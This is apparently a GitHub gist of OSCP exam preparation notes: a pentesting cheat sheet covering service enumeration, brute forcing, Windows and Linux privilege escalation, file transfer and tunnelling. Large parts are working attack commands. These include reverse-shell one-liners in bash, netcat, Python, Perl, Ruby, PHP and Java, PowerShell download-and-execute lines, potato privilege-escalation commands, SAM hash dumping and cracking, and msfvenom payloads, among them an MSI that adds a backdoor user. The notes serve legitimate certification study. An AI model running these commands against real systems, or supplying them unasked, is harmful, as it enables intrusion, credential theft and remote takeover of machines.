Skip to content

Instantly share code, notes, and snippets.

@juanga333

juanga333/oscpprep.md

Last active June 12, 2024 09:02
Show Gist options
  • Save juanga333/fcd2699af8b38321e1acc7b7533445ef to your computer and use it in GitHub Desktop.
Save juanga333/fcd2699af8b38321e1acc7b7533445ef to your computer and use it in GitHub Desktop.
Download ZIP
OSCP PREPARATION
Raw
oscpprep.md

OSCP PREPARATION

INDEX

Buffer overflow

Pentesting

FTP

FTP is a service that allow to share files. There are some vulnerable version and misconfiguration that can aplied to the server, so we can take a look.

To connect on FTP server (maybe we need to put on passive mode to list files).

ftp <ip>

ftp <ip> <port>

FTP commands:

ls # list files
ls -a # hidden files may be important!!!
cd <path> # change directory
get <file> # get a file
put <file> # put a file into ftp server
binary # change to binary mode, we need this option to download or upload pdf, binaries...
ascii # change to ascii mode, the default mode
passive # to bypass some firewall rules

Also, we can download FTP folder into attacker machine. This could be usefull if there is lots of files, and Linux commands will help us to find things (for example, using "grep -R password", "find . -name web.config"...)

wget -m ftp://<USER>:<PASS>@<IP>

Brute force with hydra:

hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ftp://<IP> -u -vV

METHODOLOGY

  • Has this FTP server public exploits? Search the version in searchsploit and google it!
  • Can we log in with anonymous user? Can we log in with ftp : ftp user?
  • If we find an username, try easy credentials with them. For example, if we enumerate that admin is a valid username, try admin : admin, admin : password...
    • Also we can try to brute force that user. Be carefull, the machine could block us!
  • If we can log in
    • What folder it is? Can we read sensitive files (configuration files with credentials, files with version numbers...)?
    • Is it a web folder? Can we upload a webshell?

MORE RESOURCES

SSH

SSH is a remote administration protocol. If we find a way to authenticate to it, we can execute commands as that user.

Connect:

ssh <user>@<ip> -p <port>

If we find an id_rsa key:

chmod 600 <id_rsa_file>
ssh <user>@<ip> -p <port> -i <id_rsa_file>

Brute force:

# with hydra
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ssh://<IP> -u -vV

# with crackmapexec
cme ssh <ip> -u <user> -p <passwords_file>
cme ssh <ip> -u <users_files> -p <passwords_file>

METHODOLOGY

  • Has this SSH server any public exploits?
  • Many times the SSH server reveals the Operating System version of the machine. We can look for the OS that support the specific SSH server version. For example, OpenSSH 8.2.p1 Ubuntu 4Ubuntu0.1, corresponds to Ubuntu focal (20.04), according with launchpad https://launchpad.net/ubuntu/+source/openssh/1:8.2p1-4ubuntu0.1
  • If we have a potential user, we may brute force it. Note that brute force SSH users is veeeeeeery slow!

MORE RESOURCES

SMTP

SMTP is a mail protocol that can be used to send mails. This service is usually misconfigurate, so we can try to enumerate it.

Connect to the server, check information like version...

nc -nv <IP> 25
  EHLO localhost
telnet <IP> 25
  EHLO localhost

SMTP support some interesting commands, such as VRFY, EXPN and RCPT (when sending an email). This commands could allow us to enumerate users without authentication.

nc -nv <IP> 25
  EHLO localhost

  VRFY admin # VRFY command

  EXPN admin # EXPN command

  MAIL FROM: <root>
  RCPT TO: <admin> # RCTP command

Also, we can use automatic tools:

smtp-user-enum -M <MODE> -u <USER> -t <IP>

smtp-user-enum -M <MODE> -U <FILE> -t <IP>

nmap --script smtp-enum-users <IP>

METHODOLOGY

  • Connect with netcat or telnet to the SMTP server. What software and version is it? Searchsploit and google it.
  • Can we enumerate users? If we find an user, we can try to bruteforce it in other services.

MORE RESOURCES

DNS

DNS is the service that translate domain names into ip address (is easier to a person to memorize a domain name that an ip address). For OSCP exam, the found names can be used by a web service to apply virtual hosting (we want hosts to add to /etc/hosts file). DNS is a very critical system, so we are going to cover some enumeration tips.

Reverse lookup with nslookup:

nslookup
  SERVER <ip>
  127.0.0.1
  <ip>

Or using dnsrecon:

dnsrecon -r 127.0.0.0/24 -n <ip>  # this command interates the ip (127.0.0.1, 127.0.0.2 ... 127.0.0.255) and looks for a domain response.

A zone transfer is a replication of a DNS database. Sometimes, this is needed to copy a databases from a DNS master to other DNS slaves. If this are not correctly configured, and allow non slaves machines to ask for a zone transfer, an attacker can see the entire database. This is called zone transfer attack, and we can do it with dig.

dig axfr @<ip> # zone transfer without domain

dig axfr @<DNS_IP> <DOMAIN> # zone transfer with a domain

Or using dnsrecon:

dnsrecon -d <domain> -t axfr

Using dnsenum, a very popular tool to enumerate DNS servers:

dnsenum <dominio>

dnsenum --noreverse --enum --dnsserver <ip> <domain>

Nmap scripts enumeration:

nmap -vv -p 53 -sT --script=+dns* --script-args "dns-nsec-enum.domains='<domain>',dns-nsec3-enum.domains='<domain>',dns-brute.domain='<domain>'" <ip>

METHODOLOGY

  • Try reverse lookup for 127.0.0.1 and the ip address. We can also try with 127.0.0.1/24 and ip/24
  • Is this server vulnerable to transfer zone attack?
  • If we a domain name, we can try to run dnsenum.

MORE RESOURCES

FINGER

Finger is a service that can be use to find information about users in a machine. This information can be name and other details from the user.

User enumeration:

finger @<ip>
finger <user>@<ip>

In order to enumerate users from a list, we can use finger-user-enum from pentestmonkey.

finger-user-enum.pl -U users.txt -t <ip>| less -S

Some finger version could be vulnerable to command injection:

finger "|/bin/id@<IP>"
finger "|/bin/ls -a /<IP>"

METHODOLOGY

  • Can we execute commands with command injection?
  • Sometimes there are users logged in. Try to get more information about the user with finger command.
  • Enumerate users with finger-user-enum.pl
  • Users found can be bruteforce

MORE RESOURCES

HTTP/HTTPS

SPIDERING

The process of spidering is the process in which we get the list of the resources that are linked to the web aplication. This technique may be usefull in our enumeration process.

gospider -d <DEPTHS> --robots --sitemap -t <THREADS> -s <URL>

FUZZING

We can try to fuzz a web in order to look for interesting resources that are not directly index on the web page. I usually use dirsearch, gobuster and wfuzz.

# dirsearch
# if we use dirsearch without any dictionary, it will use a default dictionary with some default extensions.
disearch -u <url> 
# we can specify the dictionary, extensions, and threads
dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u <url> -e <extensions> -f -t 20

# wfuzz
wfuzz -t 20 -c --hc=404 -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://<ip>/FUZZ
# with wfuzz, we can fuzz whatever parameters we want. In this case, we create a file named "extensions", in which we put the extensions we want to fuzz on
wfuzz -t 20 -c --hc=404 -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -z file,extensions http://<ip>/FUZZ.FUZ2Z

# gobuster
gobuster dir -u http://cronos.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x .php

Enumerate technologies

We can determine what technologies are using the target aplication web, basing on the respond (header, html...). We can use whatweb, developed in ruby

whatweb <URL>
whatweb -a 1 <URL> #Stealthy
whatweb -a 3 <URL> #Aggresive

Also,

POP

POP is a mail protocol used to get email messages from a remote computer (POP server).

Connect to the server, check information like version...

nc -nv <IP> 110

telnet <IP> 110

Read mails (credentials is needed):

telnet <IP> 110
  USER <USER>
  PASS <PASSWORD>
  LIST
  RETR <MAIL_NUMBER>
  QUIT

Or we can use evolution client.

Brute force:

hydra -l <USER> -P <PASSWORDS_LIST> -f <IP> pop3 -V
hydra -S -v -l <USER> -P <PASSWORDS_LIST> -s 995 -f <IP> pop3 -V

METHODOLOGY

  • Connect with netcat or telnet to the POP server. What software and version is it? Searchsploit and google it.
  • This service has default credentials or common credentials like admin : admin?
  • If we find some users (with finger, smtp, or whatever service), we can try to brute force it. Be carefull, machine could block you.

MORE RESOURCES

Windows

Reverse shell

Thanks to smb service, Windows allows us to call a binary found in a shared folder. We can create a smb shared folder with impacket:

smbserver.py smbFolder . -smb2support

And in the Windows victim we can run:

\\<ip>\smbFolder\nc.exe -nv <ip> <port> -e powershell.exe

\\<ip>\smbFolder\nc.exe -nv <ip> <port> -e cmd.exe

\\<ip>\smbFolder\reverse.exe

Some Windows rules could block smb connection without credentials. In that case, we can get a reverse shell througth powershell.

With Invoke-PowerShellTcp from Nishang framework:

IEX(New-Object Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port>

With powercat

IEX (New-Object System.Net.Webclient).DownloadString('http://<ip>/powercat.ps1'); powercat -c <ip> -p <port> -e cmd.exe

Don't forget to run an http server with these powershell scripts!

File transfer

HTTP

First of all, you must run an HTTP server, for example, with python

python -m http.server 80

Then, you can download the file with powershell

IEX (new-object System.Net.WebClient).DownloadFile('http://<ip>/<file>','<path_file>')

Or with certutil

certutil.exe -f -urlcache -split http://<ip>/<file> <path_file>

POWERCAT

Powercat is a very powerful tool developed in powershell, and we can use it to transfer files (and more things).

We can run netcat on the attacker machine with the file we want to transfer

nc -lvnp <port> < <file>

Then, we run powercat on the victim machine

# first we load powercat in memory
IEX (New-Object System.Net.Webclient).DownloadString('http://<ip>/powercat.ps1');

# then we can run powercat almost as if it were a netcat
powercat -c <ip> -p <port> -o <path_file>

SMBSERVER

Impacket have a set of tools developed in python that can be used to work with network protocols (especially windows protocols). In windows it is very common to use the smb protocol to share folders, so we can transfer files with smbserver.py.

On the attacker machine, depending on the target, we may run:

smbserver.py '<folder_name>' <shared_path> . 
# or
smbserver.py '<folder_name>' <shared_path> . -smb2support

On the victim machine, we can copy files on that folder

copy \\<ip>\<folder_name>\<file> <path_file>

Also you can mount the shared folder

# with powershell
New-PSDrive -Name "SharedFolder" -PSProvider "FileSystem" -Root "\\<ip>\<folder_name>"
cd SharedFolder:

Finally, you can access to a folder with credentials. On the attacker machine we run smbserver

smbserver.py '<folder_name>' <shared_path> .  -username <user> -password <password>
# or
smbserver.py '<folder_name>' <shared_path> . -smb2support -username <user> -password <passowrd>

And then, on the target machine, we mount the shared folder with credentials

net use x: \\ip\nombrecarp /user:<usuario> <contraseña> dominio\<dominio>
cd x:

FTP

FTP is a file transfer protocol, so we can use it for this goal.

On the attacker machine

python3 -m pyftpdlib -w -p <port>

On the victim machine (if the machine has WinSCP). Maybe you need to run this with powershell

ftp <ip>
get <file>

SSH

SSH is a very useful protocol with a large amount of functionality. One of the functionalities that it allows us is the sending of files in a secure (encrypted) way

On the attacker machine

service ssh start

On the victim machine

# scp source destination
scp  <user>@<ip>:<attacker_path_file> <victim_path_copy>

SPAWN TTY SHELL

Since Windows 10 / Windows Server 2019 version 1809 (build 10.0.17763), we are able to spawn a fully interactive tty. We can use ConPtyShell.

On attacker side:

# first, we run a http server to host the powershell script
python3 -m http.server 80

# listen with netcat
stty raw -echo; (stty size; cat) | nc -lvnp <port>

On victim side:

# load the script
IEX(IWR http://<ip>/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell <ip> <port>

If our target does not support CreatePseudoConsole(), we can use rlwrap with out netcat connection. This tool does not spawn a tty shell, but allow use to use the keyboard arrows and Ctr + L. Be carefull, you cannot use Ctr + C, your session will be killed.

rlwrap nc -lnvp <port>

Privilege escalation

I recommend to check Conda Privilege escalation checklist video video

Insecure privilege

SeImpersonatePrivilege

The objective of this permission is that the user who owns it, can execute programs on behalf of another user. It allows a client to impersonate after its authentication. It is a privilege that service accounts usually have in Windows, and we can escalate privileges with some exploits:

If the machine is < Windows 10 1809 < Windows Server 2019

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('<reverse_path>')" -t *
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\temp\reverse.exe -t *

Download

If the machine is >= Windows 10 1809 & Windows Server 2019

sudo socat tcp-listen:135,reuseaddr,fork tcp:<victim_ip>:9999 # atacker machine
.\RoguePotato.exe -r <attacker_ip> -e "<reverse_shell>" -l 9999 # victim machine
./chisel server -p 8000 --reverse # attacker machine
.\chisel client <attacker_ip>:8000 R:135:localhost:9999 # victim machine
.\RoguePotato.exe -r <attacker_ip> -e "<reverse_shell>" -l 9999 # victim machine

Download

  • PrintSpoofer

Windows Server 2016, Server 2019, and Windows 10

PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -c "<binary>"

Download

More:

SeLoadDriverPrivilege

Allows the loading and execution of drivers in the context of the kernel.

.\EoPLoadDriver.exe System\CurrentControlSet\MyService Capcom.sys
.\ExploitCapcom.exe

More:

SeBackupPrivilege

This privilege allows us to make backups of important files such as sam and system.

reg save hklm\sam C:\temp\sam.save
reg save hklm\system C:\temp\system.save

Therefore, with this commands we can obtain the local credentials of the system. If we have to get the credentials of a domain, we would also need the SeRestorePrivilege privilege, since to dump the NTDS.dit, we cannot simply do the above, we have to do a volume shadow copy. That's not requiered for OSCP exam.

More:

Check more insecure privilege: https://github.com/gtworek/Priv2Admin

Services exploits

Modifiable services

This vulnerability occurs when we can modify the properties of a service, so we can change which binary a service calls. In order for it to be exploitable at the moment, we need to be able to restart the service.

accesschk.exe /accepteula -uwcqv <user> <service>
sc qc <service> 
sc config <service> binpath= "<reverse_shell>"
net stop [service]
net start [service]

Modifiable service file

This vulnerability is caused if we can overwrite a binary called by a service. We need to be able to restart the service.

accesschk.exe /accepteula -uwcqv <user> <service>
sc qc <service> 
net stop [service]
copy <reverse_shell> <path_servicio> /Y 
net start [service]

More:

Unquoted service path

This vulnerability is caused when a service is not defined in quotes, and we can write to any of the above directories. To exploit it we need

  • Be able to restart the service
  • Write permissions on any of the previous binary calls

For example, if there is a service that calls the following binary:

C:\Program Files\My folder\My binary.exe

Windows will look for the binary in the following order:

"C:\Program.exe" "Files\My folder\My binary.exe"
"C:\Program Files\My.exe" "folder\My binary.exe"
"C:\Program Files\My folder\My.exe" "binary.exe"
"C:\Program Files\My folder\My binary.exe"

Therefore, to exploit this vulnerability, we need to be able to create any of the binaries before it hits the real one.

sc.exe qc <service> -> vemos que binario se corresponde con el servicio, quien lo ejecuta...
accesschk.exe /accepteula -uwdq "<service>" -> comprobar permisos
# if we can write to any of the directories
copy <reverse_shell> "<previous_binary>"
net stop [service]
net start [service]

More:

Weak Registry Permissions

When a service is created in Windows, a registry entry is created that contains important information about the service. If we have permissions to modify that entry, we can change the path of the image, for a reverse shell. We need to be able to restart the service.

.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\<servicio>
reg add HKLM\SYSTEM\CurrentControlSet\services\<servicio> /v ImagePath /t REG_EXPAND_SZ /d <reverse_shell> /f
net stop <sercice>
net start <service>

DLL HIJACKING

This vulnerability occurs when a service looks for a DLL that does not exist on the system. To exploit it we need:

  • Have write permissions on the missing DLL location
  • Be able to restart the service so that it loads the DLL

Create the DLL

msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f dll -o shell.dll

We put it on the right path and restart the service

copy shell.dll <path_dll_hijacking>
net stop <servicio>
net start <servicio>

REGISTRY

AutoRun

This vulnerability allows us to change a binary that runs when logging in.

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run # Check autorun binaries
accesschk.exe /accepteula -wvu "<auto_run_binary>" # Check permissions
copy <reverse_shell> "<auto_run_binary>" /Y  # Change binary

AlwaysInstallElevated

This registry allows us to install .msi files with administrator privileges.

To check the registry

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

We generate the installer

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o reverse.msi
# or
msfvenom -p windows/adduser USER=backdoor PASS='Juanga123#' -f msi -o evil.msi

Run malicious msi

msiexec.exe /quiet /qn /i <msi_path>

PASSWORDS

Registry

# to find keys and values in the registry that contain the word "pass"
reg query HKLM /f pass /t REG_SZ /s  
# to find the administrator auto login credentials
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

Saved Credentials

# are there credentials stored?
cmdkey /list
# reverse shell with saved credentials
runas /savecred /user:<user> <reverse_shell_binary>

SAM AND SYSTEM

Dump hashes with impacket

# without security file
secretsdump -sam SAM -system SYSTEM LOCAL
# with security file
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

Dump hashes with creddump7 from Tib3rius

git clone https://github.com/Tib3rius/creddump7
pip3 install pycrypto
python3 creddump7/pwdump.py SYSTEM SAM

Crack hashes with john

john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=nt

Crack hashes with hashcat

hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt

Online webs with rainbow tables

Tools

More resources

Linux

Reverse shell

Bash

bash -i >& /dev/tcp/<ip>/<port> 0>&1

0<&196;exec 196<>/dev/tcp/<ip>/<port>; sh <&196 >&196 2>&196

/bin/bash -l > /dev/tcp/<ip>/<port> 0<&1 2>&1

Netcat

nc -e /bin/sh <ip> <port>

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f

rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

export RHOST="<ip>";export RPORT=<port>;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Perl

perl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("<ip>",<port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e'exit if fork;c=TCPSocket.new("<ip>","<port>");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'

PHP

php -r '$sock=fsockopen("<ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("<ip>",<port>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("<ip>",<port>);`/bin/sh -i <&3 >&3 2>&3`;'

php -r '$sock=fsockopen("<ip>",<port>);system("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("<ip>",<port>);passthru("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("<ip>",<port>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<ip>/<port>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

SPAWN TTY SHELL

Once we have a reverse shell connection with the target machine, we may need to spawn a tty shell, in order to make our connection easier to use. The negative point of not doind this is that we cannot use interactive binaries like mysql, ftp...

  1. when we receive the reverse shell, we need to create the tty with one of this options:
script /dev/null -c bash
python -c 'import pty; pty,spawn("/bin/sh")'
perl -e 'exec "/bin/sh";'

At this point, we can use some interactive binaries, but if we press Ctr + C, out session will be killed.

  1. Then, we need to press Ctr + Z in order to send our shell to the background.

  2. Next, we type one of these options (depending on the attacker shell)

# bash
stty raw -echo
fg

# zsh
stty raw; -echo; fg

  1. We write reset and press enter (doesn't matter if we cannot see what we are writting)

  2. Usually, when we reset the configuration terminal, we will be asked for the terminal type, and we need to write "xterm".

  3. Export two environment variables

export TERM=xterm
export SHELL=bash
  1. And the final step is to set rows and columns
stty rows <numer_rows> columns <number_columns>

# to check rows and columns, run on the attacker side
stty -a

Now, we can use python, nano, mysql, press Ctr - L, press Ctr + C without killing the terminal...

FILE TRANSFER

NETCAT

On attacker side:

nc -lnvp <port> < <file>

On victim side:

nc -nv <attacker_ip> <attacker_port> > file

HTTP

On attacker side:

python3 -m http.server 80

On victim side:

# with wget installed
wget <attacker_ip>/<file>

# with curl installed
curl <attacker_ip>/<file -o <local_path>

SSH

On the attacker side:

service ssh start

On the victim side:

# scp source destination
scp  <user>@<ip>:<attacker_path_file> <victim_path_copy>

FTP

On the attacker side:

python3 -m pyftpdlib -w -p <port>

On the victim side:

ftp <ip>
get <file>

Msfvenom

WINDOWS

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

LINUX

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

MAC

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
msfvenom -p osx/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

ASP

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

JAR

msfvenom --platform java -f jar -p java/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o payload.jar

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

PYTHON

msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

PERL

msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

BASH

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

SHELLCODE

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=443 -f python
msfvenom -a x86   --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f python

Port forwarding

Pivoting between networks is an advanced technique that is not required to pass OSCP exam. However, a situation that can happen is the following: Imagine that you have compromised a machine, and you discover that there is a port that you can't see from outside the machine (either because the service is running on localhost or because of a rule firewall). In that case, you may forward that port to your attacker machine, and exploit the service if you can.

Therefore, in this section we are going to see remote tunneling. If you want to know more, go and Google dynamic and local tunneling.

CHISEL

Chisel is a tool that tunnels communications using ssh. You can install it through apt:

sudo apt install chisel

To upload it to the victim machine, we can download the release binary depending on the victim operating system.

So, in your attacker machine, you may run:

sudo chisel server -p <listen_port> --reverse

And in the victim machine, you may run:

.\chisel.exe client <attacker_ip>:<listen_port> R:<port_forward_victim>:127.0.0.1:<port_forward_attacker>

Chisel client and server should run with the same version.

SSH

Also, we can do port forwarding without installing any extra tools, only with an ssh client

In attacker machine, you may start your SSH server:

sudo service ssh start

In the victim machine, you may run:

ssh -N -R <port_forward_victim>:127.0.0.1:<port_forward_attacker> root@<attacker_ip>

If your victim machine is a windows that does not have SSH client, you can upload plink and run

plink.exe -l root -pw toor -R <port_forward_victim>:127.0.0.1:<port_forward_attacker> <attacker_ip>

NOTE: If you don't use the root user, you may have problems with some ports. That is because in Linux, you have to bee root in order to listen TCP and UDP ports below 1024.

Advice

  • OSCP machines could have firewall rules that block some outgoing connections. Ensure that your reverse shell goes throught a port that the machine accept. Ports that are visible from outside may be fine for your reverse shell. First try to receive a ping to check RCE.
  • Always test default credentials and typical credentials (admin : admin, admin : password, root : root...)
  • OSCP is a certification that requires a professional report. Make sure your report is as professional (and complete) as possible, you don't want to fail because of the report!

Reference

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment